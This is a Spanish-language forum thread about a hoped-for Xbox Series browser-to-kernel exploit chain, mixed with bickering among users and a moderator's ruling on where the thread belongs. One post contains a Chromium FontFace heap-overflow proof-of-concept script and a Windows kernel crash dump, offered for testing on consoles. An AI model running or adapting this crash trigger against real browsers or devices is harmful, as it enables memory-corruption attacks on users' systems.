[Scene] Posible guest kernel exploit ( Abstenerse trols/flamers, serán reportados ) en Xbox Series

[Scene] Posible guest kernel exploit ( Abstenerse trols/flamers, serán reportados )

cmhacks 12 nov 2020 05:44 *

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

Editado 3 veces. Última: 13/11/2020 - 18:18:46 por N-N.

Buenas.

Si alguien tiene una xbox series x/s, no la ha actualizado y quiere cacharrear, le agradecería que me dejara probar un par de cosas.

Necesito corroborar un buferoverflow en el kernel space del guest que se encarga del navegador y así saltar al baremetal. A partir si confirmo dicho bug, dejaría a otros que buscaran un vector desde el baremetal > firmware. ( no tengo mucho tiempo )

Ya decís que tal!

Saludos.

Torres 12 nov 2020 07:28

Rising Star

29.423 mensajes
desde nov 2002

Sinceramente dudo que a estas alturas a nadie le interese tener la consola sin actualizar por tema scene. Se pierde más de lo que se gana

cmhacks 12 nov 2020 16:57

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

Torres escribió:Sinceramente dudo que a estas alturas a nadie le interese tener la consola sin actualizar por tema scene. Se pierde más de lo que se gana

Buenas. Claro hombre, por eso se sobre entiende que la petición esta dirigida a personas que si estén dispuestas.

Saludos!

#337101# 13 nov 2020 05:15 *

Las repetiré las veces que sea acá lo que dices e tu post no va en general y lo que yo escribí tampoco...

cmhacks 13 nov 2020 15:57

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

fjrish escribió:
cmhacks escribió:Buenas.

Si alguien tiene una xbox series x/s, no la ha actualizado y quiere cacharrear, le agradecería que me dejara probar un par de cosas.

Necesito corroborar un buferoverflow en el kernel space del guest que se encarga del navegador y así saltar al baremetal. A partir si confirmo dicho bug, dejaría a otros que buscaran un vector desde el baremetal > firmware. ( no tengo mucho tiempo )

Ya decís que tal!

Saludos.

Parece que no has pillado nunca una xbox one , supongo que es normal, si quieres tenerla pirata y que no te baneen debes pagar una parte a Microsoft eran 20 euros y para siempre, desde la store busca devmode de xbox para que tu consola se convierta en modo desarrollor y puedes poner lo que tu quieras emuladores, etc.. así de simple.

Eso si hoy en día nadie lo tiene en modo Desarrollor por el game pass ultímate.

Por si alguien le interesa en la store de xbox buscar devmode.

Lo bueno de esto es que no te banean la consola y puedes disfrutar de tus emuladores o lo que quieras ponerle a la consola.

Totalmente y oficialmente por Microsoft.
https://docs.microsoft.com/es-es/window ... activation

Más información en el modo Dev con algunos emuladores
https://www.3djuegos.com/comunidad-foro ... rrollador/
No os confundáis también sirve para xbox serie S/X

En construcción...

Buenos días. Supones mal.

Saludos

PD: Abstenerse a contestar personas que no entiendan lo que pido en este hilo y vengan con suposiciones suspicaces. Serán reportadas por "flamers"

#337101# 13 nov 2020 16:54

@cmhacks
Déjate de tonterías lo del buferoverflow que comentas si o si necesitas el Dev Mode de Microsoft no puedes modificar nada si el consentimiento de ellos, además de otras cosas.
Por otro lado esto no deveria estar en general si no en otro apartado que ni siquiera está.

cmhacks 13 nov 2020 16:56

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

@fjrish reportado.

#337101# 13 nov 2020 16:58

@cmhacks
Tu estás muy mal además esto no va aquí en el foro general.

Reportado por qué lo que haces va encontrá de las normas.

cmhacks 13 nov 2020 17:02

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

@fjrish No aportas nada a lo que pido. Deja de ensuciar el hilo con tus opiniones subjetivas que no me interesan en absoluto. Lee la petición y si no aportas, aparta.. que esto no es el offtopic.

#337101# 13 nov 2020 17:05 *

Lo que haces es cosas de Scene así que déjate de tonterías y eso debería estar en el grupo de Scene no en general como comenté y lo que escribi sobre el Dev Mode lo necesitas para hacerlo así que déjate de chorradas con esa edad que tienes y valla mentalidad.

En serio me has reportado por que digo la verdad llevas desde el 2008 y pareces que aún no has leído las normas del foro tu post y te lo vuelvo a repetir no va acá, con 42 años que tienes deberías tener más énfasis

Puede que me allá pasado al decirte eso pero me fastidia que digas que lo que digo no es lo correcto cuenfo si lo es y están en las normas de EOL para algo.

cmhacks 13 nov 2020 17:11 *

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

Editado 1 vez. Última: 13/11/2020 - 17:12:17 por cmhacks.

@fjrish Ignorado.

s4ur0n 13 nov 2020 17:16

 Exiliado 

4.196 mensajes
desde nov 2002
en En el exilio

3 valoraciones positivas

fjrish escribió:@cmhacks
Déjate de tonterías lo del buferoverflow que comentas si o si necesitas el Dev Mode de Microsoft no puedes modificar nada si el consentimiento de ellos, además de otras cosas.
Por otro lado esto no deveria estar en general si no en otro apartado que ni siquiera está.

Llevo 19 años en eol y todos los temas de scene de una consola siempre se trataron en el hilo general hasta que había suficiente tráfico como para tener su subforo.

Dicho esto, cmhacks te ha respondido de forma educada y tu vienes luego a flamearle y discutir. Si no tienes nada que aportar ¿que ganas discutiendo?

cmhacks, yo estoy esperando aún por la mia sin fecha de momento, si cuando la reciba aun sigues necesitando ayuda te escribo

#337101# 13 nov 2020 17:19

@s4ur0n
Y sigo diciendo esto va en Scene, entonces para que están las normas.

s4ur0n 13 nov 2020 17:25

 Exiliado 

4.196 mensajes
desde nov 2002
en En el exilio

3 valoraciones positivas

fjrish escribió:@s4ur0n
Y sigo diciendo esto va en Scene, entonces para que están las normas.

¿Tu no lees? No es lo que tu quieras es la política de EOL en cuanto a los subforos. Hasta que no hay suficiente tráfico de un tema en concreto se habla de todo en el general.

Si te molesta que se hable de scene en general me da que vas a tener que hablar con un moderador.

Kei_Dash 13 nov 2020 17:46

→ ↓ ↘ + P

3.043 mensajes
desde ene 2001
en PaoPao.Cafe

Steam ID: kei_dash

@cmhacks
La semana próxima espero que llegará la mía desde ECI. Es muy complicado el tema? Implica abrirla?

cmhacks 13 nov 2020 17:59 *

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

Editado 4 veces. Última: 15/11/2020 - 06:32:53 por cmhacks.

Buenas!

@s4ur0n @Kei_Dash

Gracias por vuestro apoyo! Cuando podáis y queráis!

Os explico, no implica abrirla, es abrir una web que contiene un exploit que comprueba que se desborda un bufer. Vamos, la web dará como salida algo como

memory reserved, 32000
Memory write, 320000

Los exploit, se pueden cargar a través de un servidor web local o remoto. Así que no tendré ningún problema de alojarlos en github y/o enviarlos para hacer la prueba.

A partir de ahí, entrar en otra web que usa otro exploit que te permitirá ver en la consola un "hello word" en pantalla. Solo lo hará en ram.. no toca disco duro, no modifica nada y no es necesario abrir, soldar, etc. Es solo una comprobación de unas vulnerabilidades en chromium y kelnel del windows, cual usa la consola y puede ser un vector de ataque para llegar al host y de ahí baremetal (hypervisor hyper-v) y firmware.

A partir de ahí, es lo que he escrito antes, de que no tengo mucho tiempo de hacer el ultimo paso, porque requiere invertir muchas horas y si me pongo tardaría mas que cualquier otro usuario con el conocimiento para hacerlo. No obstante iré haciendo poco a poco y si cualquiera quiere, necesita los datos de los que dispongo/ga, se los cederé sin reserva.

Saludos!

PD: Edito para integrar el exploit de cromium

<body>
<script>
font_face = new FontFace('fontname', new Uint8Array([0,1,0,0,0,11,0,144,0,3,0,
32,79,83,47,50,0,0,0,0,0,0,0,188,0,0,0,96,99,109,97,112,0,0,0,0,0,0,1,28,0,
0,0,44,103,108,121,102,0,0,0,0,0,0,1,72,0,0,0,2,104,101,97,100,0,0,0,0,0,0,
1,76,0,0,0,54,104,104,101,97,0,0,0,0,0,0,1,132,0,0,0,36,104,109,116,120,0,0,
0,0,0,0,1,168,0,0,0,12,108,111,99,97,0,0,0,0,0,0,1,180,0,0,0,8,109,97,120,
112,0,0,0,0,0,0,1,188,0,0,0,32,110,97,109,101,0,0,0,0,0,0,1,220,0,0,0,6,112,
111,115,116,0,0,0,0,0,0,1,228,0,0,0,40,115,98,105,120,0,0,0,0,0,0,2,12,0,0,
1,157,0,4,3,31,1,144,0,5,0,0,2,188,2,138,0,0,0,140,2,188,2,138,0,0,1,221,0,
50,0,250,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,
32,0,64,0,65,0,67,2,238,255,6,0,0,3,32,0,18,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
32,0,8,0,0,0,1,0,3,0,1,0,0,0,12,0,4,0,32,0,0,0,4,0,4,0,1,0,0,0,67,255,255,0,
0,0,65,255,255,255,191,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,95,15,60,
245,0,43,3,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,32,3,32,0,0,0,8,0,2,
0,0,0,0,0,0,0,1,0,0,3,32,255,6,0,0,3,32,255,255,0,1,3,31,0,1,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,3,3,32,0,90,3,32,0,90,3,32,0,90,0,0,0,0,0,0,0,0,0,1,0,0,0,3,
0,8,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,0,0,0,2,0,0,
0,0,0,0,255,181,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,
0,0,1,0,1,0,0,0,1,0,0,0,12,0,150,0,72,0,0,0,20,0,0,0,20,0,0,0,208,0,0,1,145,
0,0,0,0,112,110,103,32,137,80,78,71,13,10,26,10,0,0,0,13,73,72,68,82,0,0,0,
3,0,1,0,163,8,6,0,0,1,244,153,148,89,0,0,0,121,73,68,65,84,120,1,1,110,0,
145,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,
0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,
255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,
255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,
255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,65,255,0,255,255,
65,255,92,133,71,85,172,91,212,33,0,0,0,0,73,69,78,68,174,66,96,130,241,139,
0,0,0,0,112,110,103,32,137,80,78,71,13,10,26,10,0,0,0,13,73,72,68,82,0,0,0,
3,0,1,0,163,8,6,0,0,1,244,153,148,89,0,0,0,126,73,68,65,84,120,1,1,115,0,
140,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,115,0,1,194,215,216,247,0,0,0,0,73,69,78,68,174,66,96,130,184,
140,0,0,0]));
font_face.load().then(() => {
document.fonts.add(font_face);
document.body.style.fontFamily = 'fontname';
document.body.textContent = 'B';
});
</script> </body>

Actualización

Kernel bug

SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff805742ef680, Address of the instruction which caused the bugcheck Arg3: ffffe481b8baf930, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. CONTEXT: ffffe481b8baf930 -- (.cxr 0xffffe481b8baf930) rax=0030003000200030 rbx=0000000002000000 rcx=0000000000000000 rdx=0000000000000000 rsi=0030003000200030 rdi=0000000000000001 rip=fffff805742ef680 rsp=ffffbe82059b1270 rbp=0000000000000000 r8=ffffc187ad1005a0 r9=ffffc187a5a02160 r10=0000000000000000 r11=ffffbe82059b1920 r12=0000000000000002 r13=ffffc187a5a02100 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050206 nt!RtlpHpSegPageRangeAllocate+0x100: fffff805`742ef680 3b5e1c cmp ebx,dword ptr [rsi+1Ch] ds:002b:00300030`0020004c=???????? Resetting default scope PROCESS_NAME: ConsoleApplication1.exe BAD_STACK_POINTER: ffffe481b8bae858 STACK_TEXT: ffffbe82`059b1270 fffff805`742ef20f : 00000000`00000000 ffffc187`00000000 ffff8c5e`00000000 00000000`00000000 : nt!RtlpHpSegPageRangeAllocate+0x100 ffffbe82`059b1310 fffff805`74232d70 : 00000000`00002000 00000000`00002000 ffffc187`ae9b5080 ffff935f`d0217ac8 : nt!RtlpHpSegAlloc+0x6f ffffbe82`059b13c0 fffff805`7456a06d : fffff805`74305ba0 ffffc187`a60e4080 ffffc187`66726550 00000000`00000080 : nt!ExAllocateHeapPool+0x920 ffffbe82`059b1500 fffff805`74833e8e : 00000000`00000001 ffffbe82`059b1650 00000000`00000000 ffffc187`00000000 : nt!ExAllocatePoolWithTag+0x5d ffffbe82`059b1550 fffff805`74833389 : ffff9333`c6ba28a0 ffff935f`d0d17851 ffffc187`ade2b001 ffff8288`00000001 : nt!EtwpEnumerateAddressSpace+0xaa ffffbe82`059b16c0 fffff805`74865f86 : ffffc187`ade2b080 ffffc187`ade2b080 00000000`00000001 00000000`00000001 : nt!EtwTraceProcess+0x1b1 ffffbe82`059b1950 fffff805`7485c2cf : ffffc187`ae9b5688 00000000`00000000 ffffbe82`059b1b80 00000000`00000000 : nt!PspExitProcess+0x4e ffffbe82`059b1980 fffff805`74836bcb : 00000000`00000000 ffffbe82`059b1b01 000000db`4aa8b000 ffffc187`ae9b5080 : nt!PspExitThread+0x5c7 ffffbe82`059b1a90 fffff805`743ce118 : ffffc187`00001d50 ffffc187`ae9b5080 ffffc187`ade2b080 00000000`00000000 : nt!NtTerminateProcess+0xeb ffffbe82`059b1b00 00007ffb`065dc5e4 : 00007ffb`065aa958 00000000`00000000 00000000`00000000 000002c2`99aa8a30 : nt!KiSystemServiceCopyEnd+0x28 000000db`4a90fbe8 00007ffb`065aa958 : 00000000`00000000 00000000`00000000 000002c2`99aa8a30 00000000`00000000 : ntdll!NtTerminateProcess+0x14 000000db`4a90fbf0 00007ffb`0584cd8a : 00000000`00000000 00000000`00000000 00007ffb`04419b70 000002c2`99aa8a30 : ntdll!RtlExitUserProcess+0xb8 000000db`4a90fc20 00007ffb`0437ba9c : 00000000`00000000 00000000`00000000 000000db`4a90fca8 00007ffb`0444bc20 : KERNEL32!ExitProcessImplementation+0xa 000000db`4a90fc50 00007ffb`0437b93f : 00000000`00000000 00000000`00000000 000002c2`99aa8a30 000000db`4a90fca0 : ucrtbase!exit_or_terminate_process+0x44 000000db`4a90fc80 00007ff7`3a5414db : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000001 : ucrtbase!common_exit+0x6f 000000db`4a90fcd0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000001 00000000`00000000 : ConsoleApplication1+0x14db 2: kd> k # Child-SP RetAddr Call Site 00 ffffe481`b8bae858 fffff805`744a6642 nt!DbgBreakPointWithStatus 01 ffffe481`b8bae860 fffff805`744a5d32 nt!KiBugCheckDebugBreak+0x12 02 ffffe481`b8bae8c0 fffff805`743bca07 nt!KeBugCheck2+0x952 03 ffffe481`b8baefc0 fffff805`743ce6e9 nt!KeBugCheckEx+0x107 04 ffffe481`b8baf000 fffff805`743cdb3c nt!KiBugCheckDispatch+0x69 05 ffffe481`b8baf140 fffff805`743c5632 nt!KiSystemServiceHandler+0x7c 06 ffffe481`b8baf180 fffff805`742ca765 nt!RtlpExecuteHandlerForException+0x12 07 ffffe481`b8baf1b0 fffff805`742cecfe nt!RtlDispatchException+0x4a5 08 ffffe481`b8baf900 fffff805`743bd772 nt!KiDispatchException+0x16e 09 ffffe481`b8baffb0 fffff805`743bd740 nt!KxExceptionDispatchOnExceptionStack+0x12 0a ffffbe82`059b0ef8 fffff805`743ce816 nt!KiExceptionDispatchOnExceptionStackContinue 0b ffffbe82`059b0f00 fffff805`743ca5a2 nt!KiExceptionDispatch+0x116 0c ffffbe82`059b10e0 fffff805`742ef680 nt!KiGeneralProtectionFault+0x322 0d ffffbe82`059b1270 fffff805`742ef20f nt!RtlpHpSegPageRangeAllocate+0x100 0e ffffbe82`059b1310 fffff805`74232d70 nt!RtlpHpSegAlloc+0x6f 0f ffffbe82`059b13c0 fffff805`7456a06d nt!ExAllocateHeapPool+0x920 10 ffffbe82`059b1500 fffff805`74833e8e nt!ExAllocatePoolWithTag+0x5d 11 ffffbe82`059b1550 fffff805`74833389 nt!EtwpEnumerateAddressSpace+0xaa 12 ffffbe82`059b16c0 fffff805`74865f86 nt!EtwTraceProcess+0x1b1 13 ffffbe82`059b1950 fffff805`7485c2cf nt!PspExitProcess+0x4e 14 ffffbe82`059b1980 fffff805`74836bcb nt!PspExitThread+0x5c7 15 ffffbe82`059b1a90 fffff805`743ce118 nt!NtTerminateProcess+0xeb 16 ffffbe82`059b1b00 00007ffb`065dc5e4 nt!KiSystemServiceCopyEnd+0x28 17 000000db`4a90fbe8 00007ffb`065aa958 ntdll!NtTerminateProcess+0x14 18 000000db`4a90fbf0 00007ffb`0584cd8a ntdll!RtlExitUserProcess+0xb8 19 000000db`4a90fc20 00007ffb`0437ba9c KERNEL32!ExitProcessImplementation+0xa 1a 000000db`4a90fc50 00007ffb`0437b93f ucrtbase!exit_or_terminate_process+0x44 1b 000000db`4a90fc80 00007ff7`3a5414db ucrtbase!common_exit+0x6f 1c 000000db`4a90fcd0 00000000`00000000 ConsoleApplication1+0x14db

Generado el overflow, toca investigar con el driver verifier para conseguir el instruction pointer y poder llamar al bufer con el exploit en cuestión.

N-N mod 13 nov 2020 18:20 *

-Simplificamente-

Staff
Moderador

9.888 mensajes
desde mar 2008
en Granada

Gamertag: Praettor

Editado 1 vez. Última: 13/11/2020 - 18:22:03 por N-N.

1 valoración positiva

Buenas tatdes a todos.

Este hilo se queda en General hasta que haya contenido de Scene suficiente como para crear un subforo propio.

Los offtopics, flames y demás serán borrados.

El que no quiera ni aportar ni participar en el hilo pues que no lo haga.

@fjrish , gracias por el aviso y el interés.

@cmhacks , suerte con el hilo.

cmhacks 13 nov 2020 21:55 *

29A Labs @ ZDI

1.293 mensajes
y 1 foto
desde mar 2008
en 5461727261676f6e61

Página web de cmhacks Twitter de cmhacks Gamertag: MrSandmax PSN ID: Sandmax Steam ID: MrSandman_1Stess

Editado 1 vez. Última: 13/11/2020 - 21:55:47 por cmhacks.